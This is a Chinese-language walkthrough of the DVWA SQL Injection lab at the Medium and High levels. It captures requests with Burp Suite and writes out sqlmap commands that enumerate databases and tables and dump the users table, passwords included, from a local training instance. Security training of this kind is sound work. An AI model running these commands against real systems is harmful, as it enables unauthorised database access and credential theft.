DVWA SQL Injection—Medium and high（使用sqlmap工具注入）

前情提要：

（注意：该文中我主要采取的是sqlmap工具的方式进行注入）

我已经配置了的环境与安装好的软件：

• 小皮面板中的MySQL和Apache环境已经开启
• 有火狐浏览器，且已经安装好了FoxyProxy网络代理的插件
• 已经自行安装好了burp suite抓包工具
• 有sqlmap自动注入的工具

1. 打开小皮面板中的Apache和MySQL环境

   

2. 从小皮面板中的【网站】打开dvwa靶场

   

3. 进入网站后，我会选择把地址复制粘贴到火狐浏览器中进行下一步（火狐浏览器能方便我们后续的注入操作）

   

4. 输入登录信息后，更改DVWA Security的等级为Medium

   

5. 进入SQL Injection模块中

   

6. 打开我们已经配置好的FoxyProxy代理（对应burp suite抓包工具的地址）

   

7. 打开我们的burp suite抓包工具，开启拦截（拦截是打开的时候就默认开启的）
   

SQL Injection——Medium

Medium级别和low级别的SQL Injection有很大不同，没法从输入框进行注入了

可以采取以下的方法：

1. 尝试burp suite抓包工具进行注入【手工注入】
2. 使用sqlmap工具进行注入【自动执行】

使用sqlmap工具进行注入

1. 在我们的DVWA界面中选择一个用户的id，使我们的抓包工具成功抓到包

   

2. 抓到的包我们放到重发器（Repeater）中

   

3. 创建一个新的txt文件（推荐命名为dvwa_m）【在sqlmap的文件中】

   

4. 把我们放在重发器中的内容复制粘贴进去

   

5. 打开我们的sqlmap工具，在有sqlmap.py的文件路径下直接输入“cmd”进入命令行

   

6. 使用python sqlmap.py -h进入sqlmap中(中间按enter)

7. 获得数据库：

   python .\sqlmap.py -r .\dvwa-m.txt -dbs
   

   

8. 获取表格：

   python .\sqlmap.py -r .\dvwa-m.txt -D dvwa --tables
   

   

9. 获取表格的字段数据：

   python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users --columns
   

   

10. 获取字段内容：

    python .\sqlmap.py -r .\dvwa-m.txt -D dvwa -T users -C user --dump
    

    

注意的小点：

• 在抓包工具中复制的信息的是完整的，不要有错/漏的地方
• 确保自己的DVWA网站仍在运行中（没有退出等）
• 确保文件名正确

SQL Injection——High

【简略了很多的步骤和操作过程，但运行其实和Medium是差不多的，只是比Medium多了一个页面，可以不用使用我的这种sqlmap的方法也能做到，直接在第二个弹出的页面当中使用low级别时候的操作就可以了】

high级别通关方法

• 在第二个页面中采用low测试的方法进行注入
• 使用参数--second-url进行注入

获取所有数据库：

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" --dbs

获取所有表格：

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa --tables

获取所有字段：

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users --columns

获取所有的字段内容：

python .\sqlmap.py -r .\dvwa-h.txt --second-url "http://dvwa/vulnerabilities/sqli/" -D dvwa -T users -C "user,password" --dump

--second-url+查询结果显示页面链接，将会无视这种链接防御